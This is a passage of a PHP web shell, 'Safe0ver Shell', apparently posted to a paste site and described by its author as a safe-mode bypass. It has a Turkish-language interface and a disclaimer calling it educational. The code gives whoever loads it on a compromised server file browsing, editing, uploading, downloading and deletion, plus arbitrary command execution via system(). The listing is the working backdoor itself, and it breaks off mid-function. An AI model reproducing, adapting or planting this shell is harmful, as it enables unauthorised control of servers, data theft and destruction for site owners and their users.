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May 2nd, 2017
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  1. <?php
  4. /*
  5. *****************************************************************************************
  6. * Safe0ver Shell //Safe Mod Bypass By Evilc0der *
  7. *****************************************************************************************
  8. * is a Platform Which You can Publish Your Shell Script *
  10. *****************************************************************************************
  12. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  13. !! Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz.
  14. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  15. */
  18. /*Setting some envirionment variables...*/
  20. /* I added this to ensure the script will run correctly...
  21. Please enter the Script's filename in this variable. */
  22. $SFileName=$PHP_SELF;
  24. /* uncomment the two following variables if you want to use http
  25. authentication. This will password protect your PHPShell */
  26. //$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
  27. //$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */
  29. error_reporting(0);
  30. $PHPVer=phpversion();
  31. $isGoodver=(intval($PHPVer[0])>=4);
  32. $scriptTitle = "Safe0ver";
  33. $scriptident = "$scriptTitle By";
  35. $urlAdd = "";
  36. $formAdd = "";
  38. function walkArray($array){
  39. while (list($key, $data) = each($array))
  40. if (is_array($data)) { walkArray($data); }
  41. else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
  42. }
  44. if (isset($_PUT)) walkArray($_PUT);
  45. if (isset($_GET)) walkArray($_GET);
  46. if (isset($_POST)) walkArray($_POST);
  49. $pos = strpos($urlAdd, "s=r");
  50. if (strval($pos) != "") {
  51. $urlAdd= substr($urlAdd, 0, $pos);
  52. }
  54. $urlAdd .= "&s=r&";
  56. if (empty($Pmax))
  57. $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
  58. if (empty($Pidx))
  59. $Pidx = 0;
  61. $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  62. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  64. $scriptdate = "7 Subat 2007";
  65. $scriptver = "Bet@ Versiyon";
  66. $LOCAL_IMAGE_DIR = "img";
  67. $REMOTE_IMAGE_URL = "img";
  68. $img = array(
  69. "Edit" => "edit.gif",
  70. "Download" => "download.gif",
  71. "Upload" => "upload.gif",
  72. "Delete" => "delete.gif",
  73. "View" => "view.gif",
  74. "Rename" => "rename.gif",
  75. "Move" => "move.gif",
  76. "Copy" => "copy.gif",
  77. "Execute" => "exec.gif"
  78. );
  80. while (list($id, $im)=each($img))
  81. if (file_exists("$LOCAL_IMAGE_DIR/$im"))
  82. $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
  83. else
  84. $img[$id] = "[$id]";
  91. if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
  92. setcookie("noauth","");
  93. Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
  94. Header( "HTTP/1.0 401 Unauthorized");
  95. echo "Your username or password is incorrect";
  96. exit ;
  98. }
  100. function buildUrl($display, $url) {
  101. global $urlAdd;
  102. $url = $SFileName . "?$urlAdd$url";
  103. return "<a href=\"$url\">$display</a>";
  104. }
  106. function sp($mp) {
  107. for ( $i = 0; $i < $mp; $i++ )
  108. $ret .= "&nbsp;";
  109. return $ret;
  110. }
  112. function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); }
  114. function Mydeldir($Fdir) {
  115. if (is_dir($Fdir)) {
  116. $Fh=@opendir($Fdir);
  117. while ($Fbuf = readdir($Fh))
  118. if (($Fbuf != ".") && ($Fbuf != ".."))
  119. Mydeldir("$Fdir/$Fbuf");
  120. @closedir($Fh);
  121. return rmdir($Fdir);
  122. } else {
  123. return unlink($Fdir);
  124. }
  125. }
  128. function arrval ($array) {
  129. list($key, $data) = $array;
  130. return $data;
  131. }
  133. function formatsize($insize) {
  134. $size = $insize;
  135. $add = "B";
  136. if ($size > 1024) {
  137. $size = intval(intval($size) / 1.024)/1000;
  138. $add = "KB";
  139. }
  140. if ($size > 1024) {
  141. $size = intval(intval($size) / 1.024)/1000;
  142. $add = "MB";
  143. }
  144. if ($size > 1024) {
  145. $size = intval(intval($size) / 1.024)/1000;
  146. $add = "GB";
  147. }
  148. if ($size > 1024) {
  149. $size = intval(intval($size) / 1.024)/1000;
  150. $add = "TB";
  151. }
  152. return "$size $add";
  153. }
  155. if ($cmd != "downl") {
  156. ?>
  158. <!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
  159. <HTML>
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  264. .style5 {
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  267. }
  268. -->
  269. </STYLE>
  270. <TITLE><?php echo $SFileName ?></TITLE>
  271. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
  272. <body topmargin="0" leftmargin="0">
  273. <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
  274. <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
  275. <tr>
  276. <td width="100%" class="silver border"><center>
  277. <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
  278. </center></td>
  279. </tr>
  280. </table>
  281. <table width=100% height="100%" NOWRAP border="0">
  282. <tr NOWRAP>
  283. <td width="100%" NOWRAP><br>
  285. <?php
  286. }
  288. if ( $cmd=="dir" ) {
  289. $h=@opendir($dir);
  290. if ($h == false) {
  291. echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
  292. Klas�r Listelenemiyor!L�tfen Bypass B�l�m�n� Deneyin.<br>".sp(3)."\n
  293. Script Gecisi Tamamlayamadi!
  294. <br><br>".sp(3)."\n
  295. Klas�re Girmek Icin yetkiniz Olduguna emin Olunuz...
  296. <br><br></font>\n\n\n\n";
  297. }
  298. if (function_exists('realpath')) {
  299. $partdir = realpath($dir);
  300. }
  301. else {
  302. $partdir = $dir;
  303. }
  304. if (strlen($partdir) >= 100) {
  305. $partdir = substr($partdir, -100);
  306. $pos = strpos($partdir, "/");
  307. if (strval($pos) != "") {
  308. $partdir = "<-- ...".substr($partdir, $pos);
  309. }
  310. $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
  311. $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  312. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  313. }
  314. ?>
  315. <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
  316. <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
  317. <tr>
  318. <td width="100%" class="silver border">
  319. <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
  320. </td>
  321. </tr>
  322. </table>
  323. <br>
  324. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  325. <tr>
  326. <td class="border nobottom noright">
  327. &nbsp;Listeliyor:&nbsp;
  328. </td>
  329. <td width="100%" class="border nobottom noleft">
  330. <table width="100%" border="0" cellpadding="1" cellspacing="0">
  331. <tr>
  332. <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
  333. <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
  334. </tr>
  335. </table>
  337. </td>
  338. </tr>
  339. </table>
  340. <!-- </form> -->
  341. <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
  342. <tr>
  343. <td width="100%" NOWRAP class="silver border">
  344. &nbsp;Dosya Adi&nbsp;
  345. </td>
  346. <td NOWRAP class="silver border noleft">
  347. &nbsp;Yapilabilecekler&nbsp;&nbsp;
  348. </td>
  349. <td NOWRAP class="silver border noleft">
  350. &nbsp;Boyut&nbsp;
  351. </td>
  352. <td width=1 NOWRAP class="silver border noleft">
  353. &nbsp;Yetkiler&nbsp;
  354. </td>
  355. <td NOWRAP class="silver border noleft">
  356. &nbsp;Son D�zenleme&nbsp;
  357. </td>
  358. <tr>
  359. <?php
  362. /* <!-- This whole heap of junk is the sorting section... */
  364. $dirn = array();
  365. $filen = array();
  366. $filesizes = 0;
  367. while ($buf = readdir($h)) {
  368. if (is_dir("$dir/$buf"))
  369. $dirn[] = $buf;
  370. else
  371. $filen[] = $buf;
  372. }
  373. $dirno = count($dirn) + 1;
  374. $fileno = count($filen) + 1;
  376. function mycmp($a, $b){
  377. if ($a == $b) return 0;
  378. return (strtolower($a) < strtolower($b)) ? -1 : 1;
  379. }
  381. if (function_exists("usort")) {
  382. usort($dirn, "mycmp");
  383. usort($filen, "mycmp");
  384. }
  385. else {
  386. sort ($dirn);
  387. sort ($filen);
  388. }
  389. reset ($dirn);
  390. reset ($filen);
  391. if (function_exists('array_merge')) {
  392. $filelist = array_merge ($dirn, $filen);
  393. }
  394. else {
  395. $filelist = $dirn + $filen;
  396. }
  399. if ( count($filelist)-1 > $Pmax ) {
  400. $from = $Pidx * $Pmax;
  401. $to = ($Pidx + 1) * $Pmax-1;
  402. if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
  403. $to = count($filelist) - 1;
  404. if ($to > count($filelist)-1)
  405. $to = count($filelist)-1;
  406. $Dcontents = array();
  407. For ($Fi = $from; $Fi <= $to; $Fi++) {
  408. $Dcontents[] = $filelist[$Fi];
  409. }
  411. }
  412. else {
  413. $Dcontents = $filelist;
  414. }
  416. $tdcolors = array("lighttd", "darktd");
  418. while (list ($key, $file) = each ($Dcontents)) {
  419. if (!$tdcolor=arrval(each($tdcolors))) {
  420. reset($tdcolors);
  421. $tdcolor = arrval(each($tdcolors)); }
  423. if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
  424. /* <!-- Dirname --> */
  425. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
  426. /* <!-- Actions --> */
  427. echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
  428. /* <!-- Rename --> */
  429. if ( ($file != ".") && ($file != "..") )
  430. echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
  431. /* <!-- Delete --> */
  432. if ( ($file != ".") && ($file != "..") )
  433. echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
  434. /* <!-- End of Actions --> */
  435. echo "&nbsp;&nbsp;</center></td>\n";
  436. /* <!-- Size --> */
  437. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
  438. /* <!-- Attributes --> */
  439. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  440. echo "<strong>D</strong>";
  441. if ( @is_readable("$dir/$file") ) {
  442. echo "<strong>R</strong>";
  443. }
  444. if (function_exists('is_writeable')) {
  445. if ( @is_writeable("$dir/$file") ) {
  446. echo "<strong>W</stong>";
  447. }
  448. }
  449. else {
  450. echo "<strong>(W)</stong>";
  451. }
  452. if ( @is_executable("$dir/$file") ) {
  453. echo "<Strong>X<strong>";
  454. }
  455. echo "&nbsp;&nbsp;</td>\n";
  456. /* <!-- Date --> */
  457. echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  458. echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
  459. echo "</td>";
  460. echo "</tr>\n";
  462. }
  463. else { /* <!-- Then it must be a File... --> */
  464. /* <!-- Filename --> */
  465. if ( @is_readable("$dir/$file") )
  466. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
  467. else
  468. echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
  469. /* <!-- Actions --> */
  470. echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
  471. /* <!-- Rename --> */
  472. echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
  473. /* <!-- Edit --> */
  474. if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
  475. echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
  476. /* <!-- Copy --> */
  477. echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
  478. /* <!-- Move --> */
  479. if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
  480. echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
  481. /* <!-- Delete --> */
  482. echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
  483. /* <!-- Download --> */
  484. echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
  485. /* <!-- Execute --> */
  486. if ( @is_executable("$dir/$file") )
  487. echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
  488. /* <!-- End of Actions --> */
  489. echo sp(2)."</center></td>\n";
  490. /* <!-- Size --> */
  491. echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
  492. $size = @filesize("$dir/$file");
  493. If ($size != false) {
  494. $filesizes += $size;
  495. echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
  496. }
  497. else
  498. echo "&nbsp;&nbsp;<strong>0 B<strong>";
  499. echo "&nbsp;&nbsp;</td>\n";
  501. /* <!-- Attributes --> */
  502. echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  504. if ( @is_readable("$dir/$file") )
  505. echo "<strong>R</strong>";
  506. if ( @is_writeable("$dir/$file") )
  507. echo "<strong>W</stong>";
  508. if ( @is_executable("$dir/$file") )
  509. echo "<Strong>X<strong>";
  510. if (function_exists('is_uploaded_file')){
  511. if ( @is_uploaded_file("$dir/$file") )
  512. echo "<Strong>U<strong>";
  513. }
  514. else {
  515. echo "<Strong>(U)<strong>";
  516. }
  517. echo "&nbsp;&nbsp;</td>\n";
  518. /* <!-- Date --> */
  519. echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  520. echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
  521. echo "</td>";
  522. echo "</tr>\n";
  523. }
  524. }
  526. echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
  527. echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klas�r,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
  528. echo "</td><td NOWRAP class=\"silver border noleft\">\n";
  529. echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
  531. function printpagelink($a, $b, $link = ""){
  532. if ($link != "")
  533. echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
  534. else
  535. echo "<b>| $a - $b |</b>";
  536. }
  538. if ( count($filelist)-1 > $Pmax ) {
  539. echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
  540. $Fi = 0;
  541. while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
  542. $from = $Fi*$Pmax;
  543. while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
  544. $to = ($Fi + 1) * $Pmax - 1;
  545. if ($Fi == $Pidx)
  546. $link="";
  547. else
  548. $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  549. printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  550. echo "&nbsp;&nbsp;&nbsp;";
  551. $Fi++;
  552. }
  553. $from = $Fi*$Pmax;
  554. while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
  555. $to = count($filelist)-1;
  556. if ($Fi == $Pidx)
  557. $link="";
  558. else
  559. $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
  560. printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
  563. echo "</center></td></tr></table></td></tr>";
  564. }
  567. echo "</table>\n<br><table NOWRAP>";
  569. if ($isGoodver) {
  570. echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
  571. }
  572. else {
  573. echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
  574. }
  575. /* <!-- Other Actions --> */
  576. echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
  577. echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
  578. buildUrl( "| Yeni Klas�r |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
  579. buildUrl( "| Dosya Y�kle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
  580. echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
  581. echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
  582. echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klas�r:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
  583. echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
  584. echo "<table NOWRAP>";
  585. echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klas�r.</td></tr>\n";
  586. echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
  587. echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
  588. echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
  589. echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
  590. echo "</table></td>";
  591. echo "</table>";
  592. echo "<br>";
  593. @closedir($h);
  594. }
  595. elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
  596. echo system("$file");
  597. }
  598. elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
  599. echo "<center><table><tr><td NOWRAP>" ;
  600. if ($auth == "yes") {
  601. if (Mydeldir($file)==false) {
  602. echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
  603. }
  604. else {
  605. echo "Successfully removed \"$file\"<br>";
  606. }
  607. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form>";
  608. }
  609. else {
  610. echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
  611. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  612. <input type=\"hidden\" name=\"cmd\" value=\"deldir\">
  613. <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  614. <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  615. <input type=\"hidden\" name=\"file\" value=\"$file\">
  616. <input type=\"hidden\" name=\"auth\" value=\"yes\">
  617. <input type=\"submit\" value=\"Yes\"></form>
  618. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  619. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  620. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  621. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  622. }
  623. echo "</td></tr></center>";
  624. }
  625. elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
  626. if ($auth == "yes") {
  627. if (@unlink($file)==false) {
  628. echo "Could not remove \"$file\"<br>";
  629. }
  630. else {
  631. echo "Successfully removed \"$file\"<br>";
  632. }
  633. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form>";
  634. }
  635. else {
  636. echo "Are you sure you want to delete \"$file\" ?
  637. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  638. <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
  639. <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
  640. <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
  641. <input type=\"hidden\" name=\"file\" value=\"$file\">
  642. <input type=\"hidden\" name=\"auth\" value=\"yes\">
  644. <input type=\"submit\" value=\"Yes\"></form>
  645. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  646. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  647. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  648. <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
  649. }
  650. echo "</td></tr></center>";
  651. }
  652. elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
  653. echo "<center><table><tr><td NOWRAP>";
  654. $i = 1;
  655. while (file_exists("$lastdir/newfile$i.txt"))
  656. $i++;
  657. $file = fopen("$lastdir/newfile$i.txt", "w+");
  658. if ($file == false)
  659. echo "Could not create the new file...<br>";
  660. else
  661. echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
  662. echo "
  663. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  664. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  665. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  666. <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\">
  667. </form></center>
  668. </td></tr></table></center> ";
  669. }
  670. elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
  671. echo "<center><table><tr><td NOWRAP>" ;
  672. $i = 1;
  673. while (is_dir("$lastdir/newdir$i"))
  674. $i++;
  675. $file = mkdir("$lastdir/newdir$i", 0777);
  676. if ($file == false)
  677. echo "Could not create the new directory...<br>";
  678. else
  679. echo "Successfully created: \"$lastdir/newdir$i\"<br>";
  680. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
  681. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  682. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  683. <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\">
  684. </form></center></td></tr></table></center>";
  685. }
  686. elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
  687. $contents = "";
  688. $fc = @file( $file );
  689. while ( @list( $ln, $line ) = each( $fc ) ) {
  690. $contents .= htmlentities( $line ) ;
  691. }
  692. echo "<br><center><table><tr><td NOWRAP>";
  693. echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  694. echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
  695. echo "<strong>EDIT FILE: </strong>$file<br>\n";
  696. echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
  697. echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
  698. echo "<input type=\"submit\" value=\"Save\">";
  699. echo "</form>";
  700. echo "</td></tr></table></center>";
  701. }
  702. elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
  703. $fo = fopen($file, "w");
  704. $wrret = fwrite($fo, stripslashes($contents));
  705. $clret = fclose($fo);
  706. }
  707. elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
  708. $downloadfile = urldecode($file);
  709. if (function_exists("basename"))
  710. $downloadto = basename ($downloadfile);
  711. else
  712. $downloadto = "download.ext";
  713. if (!file_exists("$downloadfile"))
  714. echo "The file does not exist";
  715. else {
  716. $size = @filesize("$downloadfile");
  717. if ($size != false) {
  718. $add="; size=$size";
  719. }
  720. else {
  721. $add="";
  722. }
  723. header("Content-Type: application/download");
  724. header("Content-Disposition: attachment; filename=$downloadto$add");
  725. $fp=fopen("$downloadfile" ,"rb");
  726. fpassthru($fp);
  727. flush();
  728. }
  729. }
  730. elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
  731. ?>
  732. <center>
  733. <table>
  734. <tr>
  735. <td NOWRAP>
  736. Dosya Y�kleme Sekmesine Tikladiniz !
  737. <br> Eger Y�klemek istediginiz Dosya mevcut ise �zerine Yazilir.<br><br>
  738. <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
  739. <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
  740. <input type="hidden" name="cmd" value="uploadproc">
  741. <input type="hidden" name="dir" value="<?php echo $dir ?>">
  742. <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
  743. <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
  744. Dosya Y�kle:<br>
  745. <input size="75" name="userfile" type="file"><br>
  746. <input type="submit" value="Y�kle">
  747. </form>
  748. <br>
  749. <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
  750. <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
  751. <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
  752. <input tabindex="0" type="submit" value="Iptal">
  753. </form>
  754. </td>
  755. </tr>
  756. </table>
  757. </center>
  759. <?php
  760. }
  761. elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
  762. echo "<center><table><tr><td NOWRAP>";
  763. if (file_exists($userfile))
  764. $res = copy($userfile, "$dir/$userfile_name");
  765. echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
  766. if ($res) {
  767. echo "Basariyla Y�klendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
  768. echo "Y�klenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
  769. echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
  770. }
  771. else {
  772. echo "Y�klenemedi...";
  773. }
  774. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form></center>" ;
  775. echo "<br><br></td></tr></table></center>";
  776. }
  777. elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
  778. echo "<hr>";
  779. $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
  780. echo spacetonbsp(@htmlentities($line))."<br>\n";
  781. }
  782. echo "<hr>";
  783. }
  784. elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
  785. if (function_exists('is_dir')) {
  786. if (is_dir("$oldfile")) {
  787. $objname = "Directory";
  788. $objident = "Directory";
  789. }
  790. else {
  791. $objname = "Filename";
  792. $objident = "file";
  793. }
  794. }
  795. echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
  796. If (empty($newfile) != true) {
  797. echo "<center>";
  798. $return = @rename($oldfile, "$olddir$newfile");
  799. if ($return) {
  800. echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
  801. }
  802. else {
  803. if ( @file_exists("$olddir$newfile") ) {
  804. echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
  805. }
  806. else {
  807. echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
  808. }
  809. }
  810. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form></center>" ;
  811. }
  812. else {
  813. $dpos = strrpos($oldfile, "/");
  814. if (strval($dpos)!="") {
  815. $olddir = substr($oldfile, 0, $dpos+1);
  816. }
